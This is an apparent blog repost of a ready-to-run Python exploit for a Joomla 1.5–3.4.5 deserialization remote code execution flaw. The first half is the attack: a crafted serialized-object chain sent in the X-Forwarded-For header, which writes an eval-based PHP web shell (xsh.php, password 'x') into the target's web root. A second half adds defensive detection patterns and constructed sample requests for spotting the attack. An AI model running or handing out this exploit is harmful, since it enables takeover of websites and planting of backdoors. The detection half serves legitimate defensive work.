  • Joomla! [1.5-3.4.5] deserialization remote code execution EXP (writes a shell directly)

    Usage: x.py http://xxx.com

    # coding=utf-8
    # author:KuuKi
    # Help: joomla 1.5-3.4.5 unserialize remote code execution

    import urllib2
    import cookielib,sys
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    urllib2.socket.setdefaulttimeout(10)

    payload = 'file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."xsh.php","x3C".chr(63)."@eval(x5Cx24_POST[x]);")'

    forward = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"x5C0x5C0x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:' + str(len(payload)+28) + ':"' + payload + ';JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"x5C0x5C0x5C0connection";b:1;}xF0x9Dx8Cx86'
    req = urllib2.Request(url=sys.argv[1],headers={'x-forwarded-for':forward})
    opener.open(req)
    req = urllib2.Request(url=sys.argv[1])
    if 'SimplePie_Misc::parse_url' in opener.open(req).read():
        print 'Shell: '+ sys.argv[1] + '/xsh.php Password: x'
    else:
        print 'Not vulnerable!'
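
A detection-side companion to the script above, added here and not part of the original post: it flags requests whose headers carry the markers visible in the script's `x-forwarded-for` value (a `}__test|`-style session-key break, `O:<len>:"<Class>"` serialized-object tokens, a trailing 4-byte UTF-8 character) and requests for the `xsh.php` file the script writes. The function names, finding labels and sample requests are constructed for illustration.

```python
import re

# Patterns derived from the header value the script above builds.
OBJ_TOKEN = re.compile(r'O:\d+:"([A-Za-z_]\w*)":\d+:\{')  # PHP serialized object
KEY_BREAK = re.compile(r'\}__\w+\|')                       # "}__test|" style break
# 4-byte UTF-8 character: raw, or as \xNN escapes written by a web server log
UTF8_4BYTE = re.compile(
    r'[\U00010000-\U0010FFFF]|\\x[fF][0-4](?:\\x[89abAB][0-9a-fA-F]){3}')
PAGE_CLASSES = {"JDatabaseDriverMysqli", "JDatabaseDriverMysql",
                "JSimplepieFactory", "SimplePie"}
DROPPED_FILE = "/xsh.php"  # file name the script writes into the document root


def inspect_request(path, headers):
    """Return a sorted list of findings for one request (empty list = clean)."""
    findings = set()
    if path.split("?", 1)[0].lower().endswith(DROPPED_FILE):
        findings.add("request-to-dropped-file")
    for name, value in headers.items():
        classes = set(OBJ_TOKEN.findall(value))
        if not classes:
            continue  # no serialized object in this header
        findings.add("serialized-object-in-" + name.lower())
        if classes & PAGE_CLASSES:
            findings.add("known-gadget-class")
        if KEY_BREAK.search(value):
            findings.add("session-key-break")
        if UTF8_4BYTE.search(value):
            findings.add("4-byte-utf8")
    return sorted(findings)


def scan(requests):
    """Return (index, findings) for every request that has findings."""
    hits = []
    for index, (path, headers) in enumerate(requests):
        findings = inspect_request(path, headers)
        if findings:
            hits.append((index, findings))
    return hits


# Constructed sample requests (not captured traffic); object bodies are elided.
SAMPLES = [
    ("/", {"X-Forwarded-For": "203.0.113.7", "User-Agent": "Mozilla/5.0"}),
    ("/", {"X-Forwarded-For":
           '}__test|O:21:"JDatabaseDriverMysqli":3:{...}\\xF0\\x9D\\x8C\\x86'}),
    ("/", {"X-Forwarded-For": '}__x|O:8:"stdClass":0:{}\U0001D306'}),
    ("/xsh.php", {"User-Agent": "python-urllib"}),
]
```

Calling `scan(SAMPLES)` returns findings for the last three requests only. The same patterns can be applied to any log field that records request headers.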

  • Original URL: https://www.cnblogs.com/milantgh/p/5193723.html